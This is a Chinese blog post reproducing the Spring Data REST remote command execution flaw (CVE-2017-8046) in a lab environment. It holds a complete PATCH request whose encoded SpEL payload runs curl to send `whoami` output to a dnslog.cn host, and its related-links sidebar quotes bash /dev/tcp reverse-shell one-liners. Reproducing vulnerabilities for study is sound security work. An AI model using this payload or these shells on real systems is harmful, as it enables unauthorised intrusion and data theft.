Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量382 收藏
点赞数 1
分类专栏: 复现漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/109577783
版权

环境搭建好后直接访问,漏洞页面如下
在这里插入图片描述

看到有/customers和/profile路径
访问请求会发现响应包有json传值
在这里插入图片描述

访问/customers和/profile路径
在这里插入图片描述

访问json请求中给的路径

在这里插入图片描述

构造poc
http://www.jackson-t.ca/runtime-exec-payloads.html
先对想要执行的命令进行编码然后转ascii码
在这里插入图片描述
转ascii直接写了个小脚本

ch=str(input("请输入一串字符:"))
a=[]
for i in ch:
    print(i,"的ASCII码为",ord(i))
    a.append(ord(i))
print(a)

poc如下请求包,用patch请求发送

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 398

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,51,86,121,98,67,66,103,100,50,104,118,89,87,49,112,89,67,53,122,78,50,86,116,89,106,77,117,90,71,53,122,98,71,57,110,76,109,78,117,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

成功复现漏洞
在这里插入图片描述

努力的学渣'#
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
红队常用命令速查
热门推荐
Hardworking666的博客
10-23 2万+
红队常用命令
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 1814
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
spring远程命令执行漏洞复现CVE-2017-8046
最新发布
2301_82197189的博客
05-31 232
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码。
漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行
weixin_42282189的博客
09-13 719
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响范围: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data r.
Spring Data Rest-远程命令执行漏洞CVE-2017-8046
qq_43381463的博客
04-11 453
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
CVE-2017-8046Spring Data Rest RCE)
weixin_30763455的博客
04-10 213
环境搭建参考第一个链接,springboot启动文件如下,不同的启类,将Application.class修改一下就可以了,直接debug。注意:默认版本是2.0.3版本,修改成低版本,看一下mvn下载的jar包版本 漏洞利用: 第一次请求: 第二次请求: 注意的点: 需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点: 1、请...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
常用的反弹shell的语句
qq_42133828的博客
07-03 725
shell编码:http://www.jackson-t.ca/runtime-exec-payloads.html bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/65.49.135.12/8888 0>&1 & perl版本:...
Jackson JSON生成的数据包含的中文以unicode方式编码
maozhuxigood
12-04 836
本文出处:http://blog.csdn.net/chaijunkun/article/details/8257209,转载请注明。由于本人不定期会整理相关博文,会对相应内容作出完善。因此强烈建议在原始出处查看此文。 在年初的时候,我曾经写过一篇文章介绍非关系型数据库MongoDB和Jackson JSON框架相结合实现接口敏捷开发的文章(http://blog.csdn.net/chai...
vulhub-漏洞复现Spring Data Rest 远程命令执行漏洞CVE-2017-8046))
weixin_45095113的博客
12-08 474
vulhub漏洞复现
漏洞复现----41、Spring Data Rest 远程命令执行漏洞CVE-2017-8046
七天
06-30 1094
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
EC_Carrot的博客
08-03 471
漏洞简介 Spring Data是一个为数据访问提供基于Spring模型的项目。 Pivotal Spring Data RESTSpring Boot和Spring Data中存在安全漏洞。攻击者可通过发送恶意的PATCH请求利用该漏洞执行任意的Java代码。 影响版本 Pivotal Spring Data REST 2.5.12之前的版本,2.6.7之前的版本,3.0 RC3之前的版本 Spring Boot 2.0.0M4之前版本,Spring Data Kay-RC3之前的版本 漏洞复现 访问h
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
美团技术团队
09-29 4843
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越...
【vulhub】Spring Data Rest 远程命令执行漏洞CVE-2017-8046漏洞复现验证和getshell。
qq_45300786的博客
08-01 839
漏洞详情 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 参考链接: http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/ https://tech.meituan.
Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)
baidu_38844729的博客
07-06 3128
漏洞分析 漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响版本: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data release trains < Kay-RC3 漏洞复现 1、启动环境 cd v

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值